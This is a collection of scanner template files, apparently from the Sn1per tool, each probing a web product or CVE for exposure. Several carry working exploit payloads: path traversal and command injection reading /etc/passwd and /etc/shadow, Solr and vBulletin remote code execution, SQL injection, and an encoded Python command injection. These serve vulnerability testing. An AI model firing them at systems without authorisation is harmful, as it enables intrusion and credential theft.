-------------------------------------------------------------------------------- /templates/active/AWS_S3_Public_Bucket_Listing.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AWS S3 Public Bucket Listing' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="listbucket" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability' 3 | URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/' 4 | METHOD='GET' 5 | MATCH="phpinfo\(\)" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Apache_Solr_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Solr Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="Solr\ Admin" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Apache_Tomcat_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Tomcat Detected' 3 | URI='/404_DOES_NOT_EXIST' 4 | METHOD='GET' 5 | MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-o' 
-------------------------------------------------------------------------------- /templates/active/AvantFAX_LOGIN_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AvantFAX LOGIN Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="AvantFAX\ LOGIN" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal' 3 | URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' 4 | METHOD='GET' 5 | MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read' 3 | URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11580 - 
Atlassian Crowd Data Center Unauthenticated RCE' 3 | URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11581 - Jira Template Injection' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Contact Site Administrators' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure' 3 | URI="/cgi-bin/config.exp" 4 | METHOD='GET' 5 | MATCH="sysconfig" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution' 3 | URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 
-------------------------------------------------------------------------------- /templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution' 3 | URI='/' 4 | METHOD='POST' 5 | MATCH='1787569' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass' 3 | URI='/ajax/render/widget_tabbedcontainer_tab_panel' 4 | METHOD='POST' 5 | MATCH='PHP\ Version' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | -------------------------------------------------------------------------------- /templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-17558 - Apache Solr RCE' 3 | 
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url) 10 | if '1337' in response.text: 11 | print("Vulnerable!") 12 | print(response.text) 13 | webdriver.quit() 14 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal' 3 | URI='/vpn/../vpns/cfg/smb.conf' 4 | METHOD='GET' 5 | MATCH='\[global\]' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- 
/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS' 3 | URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E" 4 | METHOD='GET' 5 | MATCH="<script>alert\(1337\)<\/script>" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails' 3 | URI="/../../../../../../../../etc/passwd\{\{" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003' 3 | URI='/node/1?_format=hal_json' 4 | METHOD='GET' 5 | MATCH='INVALID_VALUE\ does\ not\ correspond' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' ' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh: 
-------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE' 3 | URI='/photo/p/api/video.php' 4 | METHOD='GET' 5 | MATCH="\[\ 401\ Unauthorized\ \]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 1' 3 | URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='<title>Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: 
no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 2' 3 | URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 3' 3 | URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 4' 3 | URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh: 
-------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal' 3 | URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" 4 | METHOD='GET' 5 | MATCH="apache2\.conf" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF' 3 | URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services' 3 | URI="/ReportServer/Pages/ReportViewer.aspx" 4 | METHOD='GET' 5 | MATCH="view\ report" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-10204 - Sonatype Nexus Repository RCE' 3 | URI="/extdirect" 4 | METHOD='POST' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | 
CURL_OPTS='--user-agent '' -s --insecure -L --data \'{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}\' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server' 3 | URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D" 4 | METHOD='GET' 5 | MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection' 3 | URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111' 4 | METHOD='GET' 5 | MATCH='chopslider_id_1111111' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal' 3 | 
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3' 3 | URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | 
MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection' 3 | URI='/userportal/webpages/myaccount/login.jsp' 4 | METHOD='GET' 5 | MATCH='loginstylesheet' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1' 3 | URI="/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | 
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="vbulletinrce" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1' 3 | URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | 
SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2' 3 | URI="/webadmin/out" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint' 3 | URI="/secure/ViewUserHover.jspa?username=randomUser" 4 | METHOD='GET' 5 | MATCH="User\ does\ not\ exist" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s --insecure -L " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS' 3 | URI='/bi-security-login/login.jsp?msi=false&redirect=">' 4 | METHOD='GET' 5 | MATCH="Oracle\ Business\ Intelligence" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-15129_-_Open_Redirect_In_Traefik.sh: -------------------------------------------------------------------------------- 1 | 
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
# Open-redirect probe: X-Forwarded-Prefix names a third-party host and -L makes curl
# follow whatever redirect comes back, so on a hit the scanner itself requests that
# host. "Found" is a very generic MATCH (any 302 page or any body containing the
# word); matching the redirect response directly (e.g. with -I, as other header checks
# here do) rather than the followed page would be more specific.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik'
URI='/'
METHOD='GET'
MATCH="Found"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh:
--------------------------------------------------------------------------------
# Exploit-confirming check, not a fingerprint: PARAM appends "; cat /etc/passwd" to the
# ping diagnostic and MATCH looks for the passwd root entry, so a hit means a command
# actually ran on the target.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE'
URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
METHOD='GET'
MATCH='root\:'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh:
--------------------------------------------------------------------------------
